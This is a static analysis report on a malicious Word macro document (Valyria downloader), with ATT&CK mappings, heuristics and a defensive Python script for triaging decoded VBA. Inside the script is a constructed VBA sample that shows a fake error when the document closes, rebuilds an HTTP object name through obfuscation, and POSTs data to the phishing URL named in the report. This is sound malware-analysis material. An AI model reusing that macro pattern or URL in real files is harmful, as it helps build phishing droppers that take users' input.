Valyria — Office (OLE) / .DOCX malware analysis

Static analysis result for SHA-256 924657d7883d8b56…

MALICIOUS

Office (OLE) / .DOCX

Size: 38.5 KB
Created: 2021-07-06 04:33:00
Authoring application: Microsoft Office Word
MD5: 074ed5398b616205258192bf7a3b6d01
SHA-1: 2b3ddae8c9f179fa84254166af02f37f34ce12c6
SHA-256: 924657d7883d8b569b9ab1a979b5492b7b6426ead1435e422b6c21dafd6657c9
Risk score: 202

Malware Insights

Valyria · confidence 95%

MITRE ATT&CK
T1566.001 Phishing: Spearphishing Attachment
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell
T1140 Deobfuscate/Decode Files or Information

ClamAV identifies the file as malicious with the signature Doc.Downloader.Valyria-10033997-0. The document carries VBA macros that use CreateObject and CallByName: the COM object is created late-bound from a ProgID held in a variable, and its methods are then invoked by name, which keeps the literal class and method names out of the macro text and defeats naive string matching. The macro reconstructs the string "MSXML2.ServerXMLHTTP" piecewise before handing it to CreateObject, giving it an object that can issue HTTP requests. The embedded URL https://fg-356-offis-dowload.com/ecm/ibm/1629832139/feedback is the likely target of those requests, either to submit collected data or to fetch a further payload; the domain name (a misspelt "office download") and the /feedback path line up with the user-form lure. The Document_Close subroutine is an auto-exec entry point that Word runs when the document is closed: it shows a fake error message and then displays a user form named 'frmFeedback', consistent with a phishing or data-collection lure whose input is posted over that HTTP channel. Nothing quoted in this report evidences PowerShell, so the T1059.001 mapping should be confirmed against the decoded macro source (macros.bas, below) rather than taken from the classifier alone.
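The checks above (auto-exec entry point, CreateObject, CallByName, an embedded URL, and a ProgID rebuilt from fragments) can be reproduced against olevba's decoded output with a few lines of Python. The script below is an added example, not code from the analysis platform or from the sample. SAMPLE_VBA is a constructed macro written to resemble the behaviour the report describes; it is not the real Valyria macro, and the procedure names GetObj and Post, the variables n and o, and the fake error text are invented (frmFeedback and the URL are taken from this report). The string evaluator is deliberately conservative: it only models literals, Chr()/ChrW(), StrReverse() and the & / + operators, and returns None for anything else rather than guessing.

```python
"""Static triage of decoded VBA macro source (added example, not the platform's code).
SAMPLE_VBA is CONSTRUCTED to resemble what the report describes; not the real macro."""
import re

SAMPLE_VBA = r'''
Private Sub Document_Close()
    MsgBox "Word experienced an error trying to open the file.", vbCritical
    frmFeedback.Show
End Sub

Private Function GetObj() As Object
    Dim n As String
    n = "MSX" & Chr(77) & Chr(76) & "2." & StrReverse("PTTHLMXrevreS")
    Set GetObj = CreateObject(n)
End Function

Private Sub Post(data As String)
    Dim o As Object
    Set o = GetObj()
    CallByName o, "Open", VbMethod, "POST", "https://fg-356-offis-dowload.com/ecm/ibm/1629832139/feedback", False
    CallByName o, "Send", VbMethod, data
End Sub
'''

# Procedure names Office runs automatically (the same set olevba reports as AutoExec).
AUTOEXEC_RE = re.compile(
    r"\bSub\s+(AutoOpen|AutoExec|AutoClose|Auto_Open|Auto_Close|"
    r"Document_Open|Document_Close|Workbook_Open)\b", re.I)
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.I)
ASSIGN_RE = re.compile(r"^[ \t]*(?:Set\s+)?(\w+)\s*=\s*(.+?)[ \t]*$", re.M)
STRLIT_RE = re.compile(r'"((?:[^"]|"")*)"')            # VBA escapes " as ""
FUNC_RE = re.compile(r"(Chr[W$]*|StrReverse)\s*\(", re.I)
NUM_ARG_RE = re.compile(r"\s*(\d+)\s*\)")


def eval_vba_string_expr(expr):
    """Evaluate an expression built only from string literals, Chr()/ChrW(n),
    StrReverse(...) and & / + concatenation. Returns None if anything else
    (a variable, another function) appears, so callers never get a half-guess."""
    pos = 0

    def skip_ws():
        nonlocal pos
        while pos < len(expr) and expr[pos].isspace():
            pos += 1

    def parse_atom():
        nonlocal pos
        skip_ws()
        m = STRLIT_RE.match(expr, pos)
        if m:
            pos = m.end()
            return m.group(1).replace('""', '"')
        m = FUNC_RE.match(expr, pos)
        if not m:
            return None
        name, pos = m.group(1).lower(), m.end()
        if name.startswith("chr"):                      # Chr(n) / ChrW(n) with a numeric literal
            n = NUM_ARG_RE.match(expr, pos)
            if not n:
                return None
            pos = n.end()
            return chr(int(n.group(1)))
        inner = parse_concat()                          # StrReverse(<expr>)
        skip_ws()
        if inner is None or pos >= len(expr) or expr[pos] != ")":
            return None
        pos += 1
        return inner[::-1]

    def parse_concat():
        nonlocal pos
        out = parse_atom()
        while out is not None:
            skip_ws()
            if pos < len(expr) and expr[pos] in "&+":
                pos += 1
                rhs = parse_atom()
                out = None if rhs is None else out + rhs
            else:
                break
        return out

    result = parse_concat()
    skip_ws()
    return result if result is not None and pos == len(expr) else None


def triage_vba(src):
    """Collect the indicators this report lists, plus every string we can rebuild."""
    rebuilt = []
    for var, rhs in ASSIGN_RE.findall(src):
        if "&" in rhs or FUNC_RE.search(rhs):           # only assignments that look assembled
            value = eval_vba_string_expr(rhs)
            if value is not None:
                rebuilt.append((var, value))
    return {
        "autoexec": sorted({m.group(1) for m in AUTOEXEC_RE.finditer(src)}),
        "createobject": bool(re.search(r"\bCreateObject\s*\(", src, re.I)),
        "callbyname": bool(re.search(r"\bCallByName\b", src, re.I)),
        "urls": sorted(set(URL_RE.findall(src))),
        "rebuilt_strings": rebuilt,
    }


if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

In practice the input would be the decoded source olevba writes out (the macros.bas artifact below); on the constructed sample the evaluator recovers "MSXML2.ServerXMLHTTP" for n, which is what turns the generic CreateObject hit into a concrete HTTP-client indicator. Evaluating only literal-only expressions keeps the output trustworthy at the cost of missing strings assembled at run time from variables or decoded arrays, which is the point where a sandbox run or manual emulation takes over.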

Heuristics 6

  • ClamAV: Doc.Downloader.Valyria-10033997-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033997-0
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://fg-356-offis-dowload.com/ecm/ibm/1629832139/feedback (referenced from the VBA macro; see Malware Insights)
    • http://schemas.openxmlformats.org/drawingml/2006/main (the standard OOXML DrawingML namespace URI, present in any .docx; not an indicator)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: eece5c8b7fd4440887598978d4db76dc0d38fbf0fd4fbe6e5bbb2f3e165d4818
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3134 bytes
Detection:
  ClamAV: No threats found (the Doc.Downloader.Valyria signature fired on the document container, not on the decoded macro text)
  Obfuscation or payload: likely. The carved macro source contains an auto-exec entry point and execution/download terms.